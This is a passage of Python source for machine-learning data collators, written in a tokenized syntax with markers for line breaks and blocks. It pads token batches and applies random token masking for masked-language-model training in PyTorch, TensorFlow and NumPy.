necessary."""<line_sep># Tensorize if necessary. <if_stmt>isinstance(examples[0] (list tuple))<block_start>examples=[tf.convert_to_tensor(e dtype=tf.int64)<for>e examples]<block_end># Check if padding is necessary. length_of_first=len(examples[0])<line_sep>are_tensors_same_length=all(len(x)<eq>length_of_first<for>x examples)<if_stmt>are_tensors_same_length<and>(pad_to_multiple_of<is><none><or>length_of_first%pad_to_multiple_of<eq>0)<block_start><return>tf.stack(examples axis=0)<block_end># If yes, check if we have a `pad_token`. <if_stmt>tokenizer._pad_token<is><none><block_start><raise>ValueError("You are attempting to pad samples but the tokenizer you are using"<concat>f" ({tokenizer.__class__.__name__}) does not have a pad token.")<block_end># Creating the full tensor and filling it with our data. max_length=max(len(x)<for>x examples)<if_stmt>pad_to_multiple_of<is><not><none><and>(max_length%pad_to_multiple_of<ne>0)<block_start>max_length=((max_length<floordiv>pad_to_multiple_of)+1)<times>pad_to_multiple_of<block_end># result = examples[0].new_full([len(examples), max_length], tokenizer.pad_token_id) result=[]<line_sep>rank=tf.rank(examples[0])<line_sep>paddings=np.zeros((rank 2) dtype=np.int32)<for_stmt>example examples<block_start><if_stmt>tokenizer.padding_side<eq>"right"<block_start>paddings[0 1]=max_length-len(example)<block_end><else_stmt><block_start>paddings[0 0]=max_length-len(example)<block_end>result.append(tf.pad(example paddings constant_values=tokenizer.pad_token_id))<block_end><return>tf.stack(result axis=0)<block_end><def_stmt>_numpy_collate_batch examples tokenizer pad_to_multiple_of:Optional[int]=<none><block_start><import_stmt>numpy<as>np<line_sep>"""Collate `examples` into a batch, using the information in `tokenizer` for padding if necessary."""<line_sep># Tensorize if necessary. <if_stmt>isinstance(examples[0] (list tuple))<block_start>examples=[np.array(e dtype=np.int64)<for>e examples]<block_end># Check if padding is necessary. length_of_first=len(examples[0])<line_sep>are_tensors_same_length=all(len(x)<eq>length_of_first<for>x examples)<if_stmt>are_tensors_same_length<and>(pad_to_multiple_of<is><none><or>length_of_first%pad_to_multiple_of<eq>0)<block_start><return>np.stack(examples axis=0)<block_end># If yes, check if we have a `pad_token`. <if_stmt>tokenizer._pad_token<is><none><block_start><raise>ValueError("You are attempting to pad samples but the tokenizer you are using"<concat>f" ({tokenizer.__class__.__name__}) does not have a pad token.")<block_end># Creating the full tensor and filling it with our data. max_length=max(len(x)<for>x examples)<if_stmt>pad_to_multiple_of<is><not><none><and>(max_length%pad_to_multiple_of<ne>0)<block_start>max_length=((max_length<floordiv>pad_to_multiple_of)+1)<times>pad_to_multiple_of<block_end>result=np.full(shape=(len(examples) max_length) fill_value=tokenizer.pad_token_id dtype=examples[0].dtype)<for_stmt>i,example enumerate(examples)<block_start><if_stmt>tokenizer.padding_side<eq>"right"<block_start>result[i :example.shape[0]]=example<block_end><else_stmt><block_start>result[i -example.shape[0]:]=example<block_end><block_end><return>result<block_end><def_stmt>tolist x<block_start><if_stmt>isinstance(x list)<block_start><return>x<block_end><elif_stmt>hasattr(x "numpy")# Checks for TF tensors without needing the import <block_start>x=x.numpy()<block_end><return>x.tolist()<block_end>@dataclass<class_stmt>DataCollatorForSeq2Seq<block_start>""" Data collator that will dynamically pad the inputs received, as well as the labels. Args: tokenizer ([`PreTrainedTokenizer`] or [`PreTrainedTokenizerFast`]): The tokenizer used for encoding the data. model ([`PreTrainedModel`]): The model that is being trained. If set and has the *prepare_decoder_input_ids_from_labels*, use it to prepare the *decoder_input_ids* This is useful when using *label_smoothing* to avoid calculating loss twice. padding (`bool`, `str` or [`~utils.PaddingStrategy`], *optional*, defaults to `True`): Select a strategy to pad the returned sequences (according to the model's padding side and padding index) among: - `True` or `'longest'`: Pad to the longest sequence in the batch (or no padding if only a single sequence is provided). - `'max_length'`: Pad to a maximum length specified with the argument `max_length` or to the maximum acceptable input length for the model if that argument is not provided. - `False` or `'do_not_pad'` (default): No padding (i.e., can output a batch with sequences of different lengths). max_length (`int`, *optional*): Maximum length of the returned list and optionally padding length (see above). pad_to_multiple_of (`int`, *optional*): If set will pad the sequence to a multiple of the provided value. This is especially useful to enable the use of Tensor Cores on NVIDIA hardware with compute capability >= 7.5 (Volta). label_pad_token_id (`int`, *optional*, defaults to -100): The id to use when padding the labels (-100 will be automatically ignored by PyTorch loss functions). return_tensors (`str`): The type of Tensor to return. Allowable values are "np", "pt" and "tf". """<line_sep>tokenizer:PreTrainedTokenizerBase<line_sep>model:Optional[Any]=<none><line_sep>padding:Union[bool str PaddingStrategy]=<true><line_sep>max_length:Optional[int]=<none><line_sep>pad_to_multiple_of:Optional[int]=<none><line_sep>label_pad_token_id:int=-100<line_sep>return_tensors:str="pt"<def_stmt>__call__ self features return_tensors=<none><block_start><import_stmt>numpy<as>np<if_stmt>return_tensors<is><none><block_start>return_tensors=self.return_tensors<block_end>labels=[feature["labels"]<for>feature features]<if>"labels"<in>features[0].keys()<else><none><line_sep># We have to pad the labels before calling `tokenizer.pad` as this method won't pad them and needs them of the # same length to return tensors. <if_stmt>labels<is><not><none><block_start>max_label_length=max(len(l)<for>l labels)<if_stmt>self.pad_to_multiple_of<is><not><none><block_start>max_label_length=((max_label_length+self.pad_to_multiple_of-1)<floordiv>self.pad_to_multiple_of<times>self.pad_to_multiple_of)<block_end>padding_side=self.tokenizer.padding_side<for_stmt>feature features<block_start>remainder=[self.label_pad_token_id]<times>(max_label_length-len(feature["labels"]))<if_stmt>isinstance(feature["labels"] list)<block_start>feature["labels"]=(feature["labels"]+remainder<if>padding_side<eq>"right"<else>remainder+feature["labels"])<block_end><elif_stmt>padding_side<eq>"right"<block_start>feature["labels"]=np.concatenate([feature["labels"] remainder]).astype(np.int64)<block_end><else_stmt><block_start>feature["labels"]=np.concatenate([remainder feature["labels"]]).astype(np.int64)<block_end><block_end><block_end>features=self.tokenizer.pad(features padding=self.padding max_length=self.max_length pad_to_multiple_of=self.pad_to_multiple_of return_tensors=return_tensors )<line_sep># prepare decoder_input_ids <if_stmt>(labels<is><not><none><and>self.model<is><not><none><and>hasattr(self.model "prepare_decoder_input_ids_from_labels"))<block_start>decoder_input_ids=self.model.prepare_decoder_input_ids_from_labels(labels=features["labels"])<line_sep>features["decoder_input_ids"]=decoder_input_ids<block_end><return>features<block_end><block_end>@dataclass<class_stmt>DataCollatorForLanguageModeling(DataCollatorMixin)<block_start>""" Data collator used for language modeling. Inputs are dynamically padded to the maximum length of a batch if they are not all of the same length. Args: tokenizer ([`PreTrainedTokenizer`] or [`PreTrainedTokenizerFast`]): The tokenizer used for encoding the data. mlm (`bool`, *optional*, defaults to `True`): Whether or not to use masked language modeling. If set to `False`, the labels are the same as the inputs with the padding tokens ignored (by setting them to -100). Otherwise, the labels are -100 for non-masked tokens and the value to predict for the masked token. mlm_probability (`float`, *optional*, defaults to 0.15): The probability with which to (randomly) mask tokens in the input, when `mlm` is set to `True`. pad_to_multiple_of (`int`, *optional*): If set will pad the sequence to a multiple of the provided value. return_tensors (`str`): The type of Tensor to return. Allowable values are "np", "pt" and "tf". <Tip> For best performance, this data collator should be used with a dataset having items that are dictionaries or BatchEncoding, with the `"special_tokens_mask"` key, as returned by a [`PreTrainedTokenizer`] or a [`PreTrainedTokenizerFast`] with the argument `return_special_tokens_mask=True`. </Tip>"""<line_sep>tokenizer:PreTrainedTokenizerBase<line_sep>mlm:bool=<true><line_sep>mlm_probability:float=0.15<line_sep>pad_to_multiple_of:Optional[int]=<none><line_sep>tf_experimental_compile:bool=<false><line_sep>return_tensors:str="pt"<def_stmt>__post_init__ self<block_start><if_stmt>self.mlm<and>self.tokenizer.mask_token<is><none><block_start><raise>ValueError("This tokenizer does not have a mask token which is necessary for masked language modeling. "<concat>"You should pass `mlm=False` to train on causal language modeling instead.")<block_end><if_stmt>self.tf_experimental_compile<block_start><import_stmt>tensorflow<as>tf<line_sep>self.tf_mask_tokens=tf.function(self.tf_mask_tokens jit_compile=<true>)<block_end><block_end>@staticmethod<def_stmt>tf_bernoulli shape probability<block_start><import_stmt>tensorflow<as>tf<line_sep>prob_matrix=tf.fill(shape probability)<line_sep><return>tf.cast(prob_matrix-tf.random.uniform(shape 0 1)<ge>0 tf.bool)<block_end><def_stmt>tf_mask_tokens self inputs:Any vocab_size mask_token_id special_tokens_mask:Optional[Any]=<none><arrow>Tuple[Any Any]<block_start>""" Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original. """<import_stmt>tensorflow<as>tf<line_sep>input_shape=tf.shape(inputs)<line_sep># 1 for a special token, 0 for a normal token in the special tokens mask # We sample a few tokens in each sequence for MLM training (with probability `self.mlm_probability`) masked_indices=self.tf_bernoulli(input_shape self.mlm_probability)&~special_tokens_mask<line_sep># Replace unmasked indices with -100 in the labels since we only compute loss on masked tokens labels=tf.where(masked_indices inputs -100)<line_sep># 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK]) indices_replaced=self.tf_bernoulli(input_shape 0.8)&masked_indices<line_sep>inputs=tf.where(indices_replaced mask_token_id inputs)<line_sep># 10% of the time, we replace masked input tokens with random word indices_random=self.tf_bernoulli(input_shape 0.1)&masked_indices&~indices_replaced<line_sep>random_words=tf.random.uniform(input_shape maxval=vocab_size dtype=tf.int64)<line_sep>inputs=tf.where(indices_random random_words inputs)<line_sep># The rest of the time (10% of the time) we keep the masked input tokens unchanged <return>inputs labels<block_end><def_stmt>tf_call self examples:List[Union[List[int] Any Dict[str Any]]]<arrow>Dict[str Any]<block_start><import_stmt>tensorflow<as>tf<line_sep># Handle dict or lists with proper padding and conversion to tensor. <if_stmt>isinstance(examples[0] Mapping)<block_start>batch=self.tokenizer.pad(examples return_tensors="tf" pad_to_multiple_of=self.pad_to_multiple_of)<block_end><else_stmt><block_start>batch={"input_ids":_tf_collate_batch(examples self.tokenizer pad_to_multiple_of=self.pad_to_multiple_of)}<block_end># If special token mask has been preprocessed, pop it from the dict. special_tokens_mask=batch.pop("special_tokens_mask" <none>)<if_stmt>self.mlm<block_start><if_stmt>special_tokens_mask<is><none><block_start>special_tokens_mask=[self.tokenizer.get_special_tokens_mask(val already_has_special_tokens=<true>)<for>val batch["input_ids"].numpy().tolist()]<line_sep># Cannot directly create as bool special_tokens_mask=tf.cast(tf.convert_to_tensor(special_tokens_mask dtype=tf.int64) tf.bool)<block_end><else_stmt><block_start>special_tokens_mask=tf.cast(special_tokens_mask tf.bool)<block_end>batch["input_ids"],batch["labels"]=self.tf_mask_tokens(tf.cast(batch["input_ids"] tf.int64) special_tokens_mask=special_tokens_mask mask_token_id=self.tokenizer.mask_token_id vocab_size=len(self.tokenizer) )<block_end><else_stmt><block_start>labels=batch["input_ids"]<if_stmt>self.tokenizer.pad_token_id<is><not><none># Replace self.tokenizer.pad_token_id with -100 <block_start>labels=tf.where(labels<eq>self.tokenizer.pad_token_id -100 labels)<block_end><else_stmt><block_start>labels=tf.identity(labels)# Makes a copy, just in case <block_end>batch["labels"]=labels<block_end><return>batch<block_end><def_stmt>torch_call self examples:List[Union[List[int] Any Dict[str Any]]]<arrow>Dict[str Any]# Handle dict or lists with proper padding and conversion to tensor. <block_start><if_stmt>isinstance(examples[0] Mapping)<block_start>batch=self.tokenizer.pad(examples return_tensors="pt" pad_to_multiple_of=self.pad_to_multiple_of)<block_end><else_stmt><block_start>batch={"input_ids":_torch_collate_batch(examples self.tokenizer pad_to_multiple_of=self.pad_to_multiple_of)}<block_end># If special token mask has been preprocessed, pop it from the dict. special_tokens_mask=batch.pop("special_tokens_mask" <none>)<if_stmt>self.mlm<block_start>batch["input_ids"],batch["labels"]=self.torch_mask_tokens(batch["input_ids"] special_tokens_mask=special_tokens_mask)<block_end><else_stmt><block_start>labels=batch["input_ids"].clone()<if_stmt>self.tokenizer.pad_token_id<is><not><none><block_start>labels[labels<eq>self.tokenizer.pad_token_id]=-100<block_end>batch["labels"]=labels<block_end><return>batch<block_end><def_stmt>torch_mask_tokens self inputs:Any special_tokens_mask:Optional[Any]=<none><arrow>Tuple[Any Any]<block_start>""" Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original. """<import_stmt>torch<line_sep>labels=inputs.clone()<line_sep># We sample a few tokens in each sequence for MLM training (with probability `self.mlm_probability`) probability_matrix=torch.full(labels.shape self.mlm_probability)<if_stmt>special_tokens_mask<is><none><block_start>special_tokens_mask=[self.tokenizer.get_special_tokens_mask(val already_has_special_tokens=<true>)<for>val labels.tolist()]<line_sep>special_tokens_mask=torch.tensor(special_tokens_mask dtype=torch.bool)<block_end><else_stmt><block_start>special_tokens_mask=special_tokens_mask.bool()<block_end>probability_matrix.masked_fill_(special_tokens_mask value=0.0)<line_sep>masked_indices=torch.bernoulli(probability_matrix).bool()<line_sep>labels[~masked_indices]=-100# We only compute loss on masked tokens # 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK]) indices_replaced=torch.bernoulli(torch.full(labels.shape 0.8)).bool()&masked_indices<line_sep>inputs[indices_replaced]=self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)<line_sep># 10% of the time, we replace masked input tokens with random word indices_random=torch.bernoulli(torch.full(labels.shape 0.5)).bool()&masked_indices&~indices_replaced<line_sep>random_words=torch.randint(len(self.tokenizer) labels.shape dtype=torch.long)<line_sep>inputs[indices_random]=random_words[indices_random]<line_sep># The rest of the time (10% of the time) we keep the masked input tokens unchanged <return>inputs labels<block_end><def_stmt>numpy_call self examples:List[Union[List[int] Any Dict[str Any]]]<arrow>Dict[str Any]<block_start><import_stmt>numpy<as>np<line_sep># Handle dict or lists with proper padding and conversion to tensor. <if_stmt>isinstance(examples[0] Mapping)<block_start>batch=self.tokenizer.pad(examples return_tensors="np" pad_to_multiple_of=self.pad_to_multiple_of)<block_end><else_stmt><block_start>batch={"input_ids":_numpy_collate_batch(examples self.tokenizer pad_to_multiple_of=self.pad_to_multiple_of)}<block_end># If special token mask has been preprocessed, pop it from the dict. special_tokens_mask=batch.pop("special_tokens_mask" <none>)<if_stmt>self.mlm<block_start>batch["input_ids"],batch["labels"]=self.numpy_mask_tokens(batch["input_ids"] special_tokens_mask=special_tokens_mask)<block_end><else_stmt><block_start>labels=np.copy(batch["input_ids"])<if_stmt>self.tokenizer.pad_token_id<is><not><none><block_start>labels[labels<eq>self.tokenizer.pad_token_id]=-100<block_end>batch["labels"]=labels<block_end><return>batch<block_end><def_stmt>numpy_mask_tokens self inputs:Any special_tokens_mask:Optional[Any]=<none><arrow>Tuple[Any Any]<block_start>""" Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original. """<import_stmt>numpy<as>np<line_sep>labels=np.copy(inputs)<line_sep># We sample a few tokens in each sequence for MLM training (with probability `self.mlm_probability`) probability_matrix=np.full(labels.shape self.mlm_probability)<if_stmt>special_tokens_mask<is><none><block_start>special_tokens_mask=[self.tokenizer.get_special_tokens_mask(val already_has_special_tokens=<true>)<for>val labels.tolist()]<line_sep>special_tokens_mask=np.array(special_tokens_mask dtype=np.bool)<block_end><else_stmt><block_start>special_tokens_mask=special_tokens_mask.astype(np.bool)<block_end>probability_matrix[special_tokens_mask]=0<line_sep># Numpy doesn't have bernoulli, so we use a binomial with 1 trial masked_indices=np.random.binomial(1 probability_matrix size=probability_matrix.shape).astype(np.bool)<line_sep>labels[~masked_indices]=-100# We only compute loss on masked tokens # 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK]) indices_replaced=np.random.binomial(1 0.8 size=labels.shape).astype(np.bool)&masked_indices<line_sep>inputs[indices_replaced]=self.tokenizer.mask_token_id<line_sep># 10% of the time, we replace masked input tokens with random word # indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced indices_random=(np.random.binomial(1 0.5 size=labels.shape).astype(np.bool)&masked_indices&~indices_replaced)<line_sep>random_words=np.random.randint(low=0 high=len(self.tokenizer) size=np.count_nonzero(indices_random) dtype=np.int64)<line_sep>inputs[indices_random]=random_words<line_sep># The rest of the time (10% of the time) we keep the masked input tokens unchanged <return>inputs labels<block_end><block_end>@dataclass<class_stmt>DataCollatorForWholeWordMask(DataCollatorForLanguageModeling)<block_start>""" Data collator used for language modeling that masks entire words. - collates batches of tensors, honoring their tokenizer's pad_token - preprocesses batches for masked language modeling <Tip> This collator relies on details of the implementation of subword tokenization by [`BertTokenizer`], specifically that subword tokens are prefixed with *##*. For tokenizers that do not adhere to this scheme, this collator will produce an output that is roughly equivalent to [`.DataCollatorForLanguageModeling`]. </Tip>"""<def_stmt>torch_call self examples:List[Union[List[int] Any Dict[str Any]]]<arrow>Dict[str Any]<block_start><if_stmt>isinstance(examples[0] Mapping)<block_start>input_ids=[e["input_ids"]<for>e examples]<block_end><else_stmt><block_start>input_ids=examples<line_sep>examples=[{"input_ids":e}<for>e examples]<block_end>batch_input=_torch_collate_batch(input_ids self.tokenizer pad_to_multiple_of=self.pad_to_multiple_of)<line_sep>mask_labels=[]<for_stmt>e examples<block_start>ref_tokens=[]<for_stmt>id tolist(e["input_ids"])<block_start>token=self.tokenizer._convert_id_to_token(id)<line_sep>ref_tokens.append(token)<block_end># For Chinese tokens, we need extra inf to mark sub-word, e.g [喜,欢]-> [喜,##欢] <if_stmt>"chinese_ref"<in>e<block_start>ref_pos=tolist(e["chinese_ref"])<line_sep>len_seq=len(e["input_ids"])<for_stmt>i range(len_seq)<block_start><if_stmt>i<in>ref_pos<block_start>ref_tokens[i]="##"+ref_tokens[i]<block_end><block_end><block_end>mask_labels.append(self._whole_word_mask(ref_tokens))<block_end>batch_mask=_torch_collate_batch(mask_labels self.tokenizer pad_to_multiple_of=self.pad_to_multiple_of)<line_sep>inputs,labels=self.torch_mask_tokens(batch_input batch_mask)<line_sep><return>{"input_ids":inputs "labels":labels}<block_end><def_stmt>tf_call self examples:List[Union[List[int] Any Dict[str Any]]]<arrow>Dict[str Any]<block_start><if_stmt>isinstance(examples[0] Mapping)<block_start>input_ids=[e["input_ids"]<for>e examples]<block_end><else_stmt><block_start>input_ids=examples<line_sep>examples=[{"input_ids":e}<for>e examples]<block_end>batch_input=_tf_collate_batch(input_ids self.tokenizer pad_to_multiple_of=self.pad_to_multiple_of)<line_sep>mask_labels=[]<for_stmt>e examples<block_start>ref_tokens=[]<for_stmt>id tolist(e["input_ids"])<block_start>token=self.tokenizer._convert_id_to_token(id)<line_sep>ref_tokens.append(token)<block_end># For Chinese tokens, we need extra inf to mark sub-word, e.g [喜,欢]-> [喜,##欢] <if_stmt>"chinese_ref"<in>e<block_start>ref_pos=tolist(e["chinese_ref"])<line_sep>len_seq=len(e["input_ids"])<for_stmt>i range(len_seq)<block_start><if_stmt>i<in>ref_pos<block_start>ref_tokens[i]="##"+ref_tokens[i]<block_end><block_end><block_end>mask_labels.append(self._whole_word_mask(ref_tokens))<block_end>batch_mask=_tf_collate_batch(mask_labels self.tokenizer pad_to_multiple_of=self.pad_to_multiple_of)<line_sep>inputs,labels=self.tf_mask_tokens(batch_input batch_mask)<line_sep><return>{"input_ids":inputs "labels":labels}<block_end><def_stmt>numpy_call self examples:List[Union[List[int] Any Dict[str Any]]]<arrow>Dict[str Any]<block_start><if_stmt>isinstance(examples[0] Mapping)<block_start>input_ids=[e["input_ids"]<for>e examples]<block_end><else_stmt><block_start>input_ids=examples<line_sep>examples=[{"input_ids":e}<for>e examples]<block_end>batch_input=_numpy_collate_batch(input_ids self.tokenizer pad_to_multiple_of=self.pad_to_multiple_of)<line_sep>mask_labels=[]<for_stmt>e examples<block_start>ref_tokens=[]<for_stmt>id tolist(e["input_ids"])<block_start>token=self.tokenizer._convert_id_to_token(id)<line_sep>ref_tokens.append(token)<block_end># For Chinese tokens, we need extra inf to mark sub-word, e.g [喜,欢]-> [喜,##欢] <if_stmt>"chinese_ref"<in>e<block_start>ref_pos=tolist(e["chinese_ref"])<line_sep>len_seq=len(e["input_ids"])<for_stmt>i range(len_seq)<block_start><if_stmt>i<in>ref_pos<block_start>ref_tokens[i]="##"+ref_tokens[i]<block_end><block_end><block_end>mask_labels.append(self._whole_word_mask(ref_tokens))<block_end>batch_mask=_numpy_collate_batch(mask_labels self.tokenizer pad_to_multiple_of=self.pad_to_multiple_of)<line_sep>inputs,labels=self.numpy_mask_tokens(batch_input batch_mask)<line_sep><return>{"input_ids":inputs "labels":labels}<block_end><def_stmt>_whole_word_mask self input_tokens:List[str] max_predictions=512<block_start>""" Get 0/1 labels for masked tokens with whole word mask proxy """<if_stmt><not>isinstance(self.tokenizer (BertTokenizer BertTokenizerFast))<block_start>warnings.warn("DataCollatorForWholeWordMask is only suitable for BertTokenizer-like tokenizers. "<concat>"Please refer to the documentation for more information.")<block_end>cand_indexes=[]<for_stmt>(i token) enumerate(input_tokens)<block_start><if_stmt>token<eq>"[CLS]"<or>token<eq>"[SEP]"<block_start><continue><block_end><if_stmt>len(cand_indexes)<ge>1<and>token.startswith("##")<block_start>cand_indexes[-1].append(i)<block_end><else_stmt><block_start>cand_indexes.append([i])<block_end><block_end>random.shuffle(cand_indexes)<line_sep>num_to_predict=min(max_predictions max(1 int(round(len(input_tokens)<times>self.mlm_probability))))<line_sep>masked_lms=[]<line_sep>covered_indexes=set()<for_stmt>index_set cand_indexes<block_start><if_stmt>len(masked_lms)<ge>num_to_predict<block_start><break><block_end># If adding a whole-word mask would exceed the maximum number of # predictions, then just skip this candidate. <if_stmt>len(masked_lms)+len(index_set)<g>num_to_predict<block_start><continue><block_end>is_any_index_covered=<false><for_stmt>index index_set<block_start><if_stmt>index<in>covered_indexes<block_start>is_any_index_covered=<true><line_sep><break><block_end><block_end><if_stmt>is_any_index_covered<block_start><continue><block_end><for_stmt>index index_set<block_start>covered_indexes.add(index)<line_sep>masked_lms.append(index)<block_end><block_end><if_stmt>len(covered_indexes)<ne>len(masked_lms)<block_start><raise>ValueError("Length of covered_indexes is not equal to length of masked_lms.")<block_end>mask_labels=[1<if>i<in>covered_indexes<else>0<for>i range(len(input_tokens))]<line_sep><return>mask_labels<block_end><def_stmt>torch_mask_tokens self inputs:Any mask_labels:Any<arrow>Tuple[Any Any]<block_start>""" Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original. Set 'mask_labels' means we use whole word mask (wwm), we directly mask idxs according to it's ref. """<import_stmt>torch<if_stmt>self.tokenizer.mask_token<is><none><block_start><raise>ValueError("This tokenizer does not have a mask token which is necessary for masked language modeling. Remove the --mlm flag if you want to use this tokenizer.")<block_end>labels=inputs.clone()<line_sep># We sample a few tokens in each sequence for masked-LM training (with probability args.mlm_probability defaults to 0.15 in Bert/RoBERTa) probability_matrix=mask_labels<line_sep>special_tokens_mask=[self.tokenizer.get_special_tokens_mask(val already_has_special_tokens=<true>)<for>val labels.tolist()]<line_sep>probability_matrix.masked_fill_(torch.tensor(special_tokens_mask dtype=torch.bool) value=0.0)<if_stmt>self.tokenizer._pad_token<is><not><none><block_start>padding_mask=labels.eq(self.tokenizer.pad_token_id)<line_sep>probability_matrix.masked_fill_(padding_mask value=0.0)<block_end>masked_indices=probability_matrix.bool()<line_sep>labels[~masked_indices]=-100# We only compute loss on masked tokens # 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK]) indices_replaced=torch.bernoulli(torch.full(labels.shape 0.8)).bool()&masked_indices<line_sep>inputs[indices_replaced]=self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)<line_sep># 10% of the time, we replace masked input tokens with random word indices_random=torch.bernoulli(torch.full(labels.shape 0.5)).bool()&masked_indices&~indices_replaced<line_sep>random_words=torch.randint(len(self.tokenizer) labels.shape dtype=torch.long)<line_sep>inputs[indices_random]=random_words[indices_random]<line_sep># The rest of the time (10% of the time) we keep the masked input tokens unchanged <return>inputs labels<block_end><def_stmt>tf_mask_tokens self inputs:Any mask_labels:Any<arrow>Tuple[Any Any]<block_start>""" Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original. Set 'mask_labels' means we use whole word mask (wwm), we directly mask idxs according to it's ref. """<import_stmt>tensorflow<as>tf<line_sep>input_shape=tf.shape(inputs)<if_stmt>self.tokenizer.mask_token<is><none><block_start><raise>ValueError("This tokenizer does not have a mask token which is necessary for masked language modeling. Remove the --mlm flag if you want to use this tokenizer.")<block_end>labels=tf.identity(inputs)<line_sep># We sample a few tokens in each sequence for masked-LM training (with probability args.mlm_probability defaults to 0.15 in Bert/RoBERTa) masked_indices=tf.cast(mask_labels tf.bool)<line_sep>special_tokens_mask=[self.tokenizer.get_special_tokens_mask(val already_has_special_tokens=<true>)<for>val labels]<line_sep>masked_indices=masked_indices&~tf.cast(special_tokens_mask dtype=tf.bool)<if_stmt>self.tokenizer._pad_token<is><not><none><block_start>padding_mask=inputs<eq>self.tokenizer.pad_token_id<line_sep>masked_indices=masked_indices&~padding_mask<block_end># Replace unmasked indices with -100 in the labels since we only compute loss on masked tokens labels=tf.where(masked_indices inputs -100)<line_sep># 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK]) indices_replaced=self.tf_bernoulli(input_shape 0.8)&masked_indices<line_sep>inputs=tf.where(indices_replaced self.tokenizer.mask_token_id inputs)<line_sep># 10% of the time, we replace masked input tokens with random word indices_random=self.tf_bernoulli(input_shape 0.1)&masked_indices&~indices_replaced<line_sep>random_words=tf.random.uniform(input_shape maxval=len(self.tokenizer) dtype=tf.int64)<line_sep>inputs=tf.where(indices_random random_words inputs)<line_sep># The rest of the time (10% of the time) we keep the masked input tokens unchanged <return>inputs labels<block_end><def_stmt>numpy_mask_tokens self inputs:Any mask_labels:Any<arrow>Tuple[Any Any]<block_start>""" Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original. Set 'mask_labels' means we use whole word mask (wwm), we directly mask idxs according to it's ref. """<import_stmt>numpy<as>np<if_stmt>self.tokenizer.mask_token<is><none><block_start><raise>ValueError("This tokenizer does not have a mask token which is necessary for masked language modeling. Remove the --mlm flag if you want to use this tokenizer.")<block_end>labels=np.copy(inputs)<line_sep># We sample a few tokens in each sequence for masked-LM training (with probability args.mlm_probability defaults to 0.15 in Bert/RoBERTa) masked_indices=mask_labels.astype(np.bool)<line_sep>special_tokens_mask=[self.tokenizer.get_special_tokens_mask(val already_has_special_tokens=<true>)<for>val labels.tolist()]<line_sep>masked_indices[np.array(special_tokens_mask dtype=np.bool)]=0<if_stmt>self.tokenizer._pad_token<is><not><none><block_start>padding_mask=labels<eq>self.tokenizer.pad_token_id<line_sep>masked_indices[padding_mask]=0<block_end>labels[~masked_indices]=-100# We only compute loss on masked tokens # 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK]) indices_replaced=np.random.binomial(1 0.8 size=labels.shape).astype(np.bool)&masked_indices<line_sep>inputs[indices_replaced]=self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)<line_sep># 10% of the time, we replace masked input tokens with random word # indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced indices_random=(np.random.binomial(1 0.5 size=labels.shape).astype(np.bool)&masked_indices&~indices_replaced)<line_sep>random_words=np.random.randint(low=0 high=len(self.tokenizer) size=labels.shape dtype=np.int64)<line_sep>inputs[indices_random]=random_words[indices_random]<line_sep># The rest of the time (10% of the time) we keep the masked input tokens unchanged <return>inputs labels<block_end><block_end>@dataclass<class_stmt>DataCollatorForSOP(DataCollatorForLanguageModeling)<block_start>""" Data collator used for sentence order prediction task. - collates batches of tensors, honoring their tokenizer's pad_token - preprocesses batches for both masked language modeling and sentence order prediction """<def_stmt>__init__ self *args **kwargs<block_start>warnings.warn("DataCollatorForSOP is deprecated and will be removed in a future version, you can now use "<concat>"DataCollatorForLanguageModeling instead." FutureWarning )<block_end><def_stmt>__call__ self examples:List[Dict[str Any]]<arrow>Dict[str Any]<block_start><import_stmt>torch<import_from_stmt>torch.nn.utils.rnn pad_sequence<line_sep>input_ids=[example["input_ids"]<for>example examples]<line_sep>input_ids=_torch_collate_batch(input_ids self.tokenizer)<line_sep>input_ids,labels,attention_mask=self.mask_tokens(input_ids)<line_sep>token_type_ids=[example["token_type_ids"]<for>example examples]<line_sep># size of segment_ids varied because randomness, padding zero to the end as the original implementation token_type_ids=pad_sequence(token_type_ids batch_first=<true> padding_value=self.tokenizer.pad_token_id)<line_sep>sop_label_list=[example["sentence_order_label"]<for>example examples]<line_sep>sentence_order_label=torch.stack(sop_label_list)<line_sep><return>{"input_ids":input_ids "labels":labels "attention_mask":attention_mask "token_type_ids":token_type_ids "sentence_order_label":sentence_order_label }<block_end><def_stmt>mask_tokens self inputs:Any<arrow>Tuple[Any Any Any]<block_start>""" Prepare masked tokens inputs/labels/attention_mask for masked language modeling: 80% MASK, 10% random, 10% original. N-gram not applied yet. """<import_stmt>torch<if_stmt>self.tokenizer.mask_token<is><none><block_start><raise>ValueError("This tokenizer does not have a mask token which is necessary for masked language modeling. Remove the --mlm flag if you want to use this tokenizer.")<block_end>labels=inputs.clone()<line_sep># We sample a few tokens in each sequence for masked-LM training (with probability args.mlm_probability defaults to 0.15 in Bert/RoBERTa) probability_matrix=torch.full(labels.shape self.mlm_probability)<line_sep>special_tokens_mask=[self.tokenizer.get_special_tokens_mask(val already_has_special_tokens=<true>)<for>val labels.tolist()]<line_sep>probability_matrix.masked_fill_(torch.tensor(special_tokens_mask dtype=torch.bool) value=0.0)<if_stmt>self.tokenizer._pad_token<is><not><none><block_start>padding_mask=labels.eq(self.tokenizer.pad_token_id)<line_sep>probability_matrix.masked_fill_(padding_mask value=0.0)<block_end>masked_indices=torch.bernoulli(probability_matrix).bool()<line_sep># probability be `1` (masked), however in albert model attention mask `0` means masked, revert the value attention_mask=(~masked_indices).float()<if_stmt>self.tokenizer._pad_token<is><not><none><block_start>attention_padding_mask=labels.eq(self.tokenizer.pad_token_id)<line_sep>attention_mask.masked_fill_(attention_padding_mask 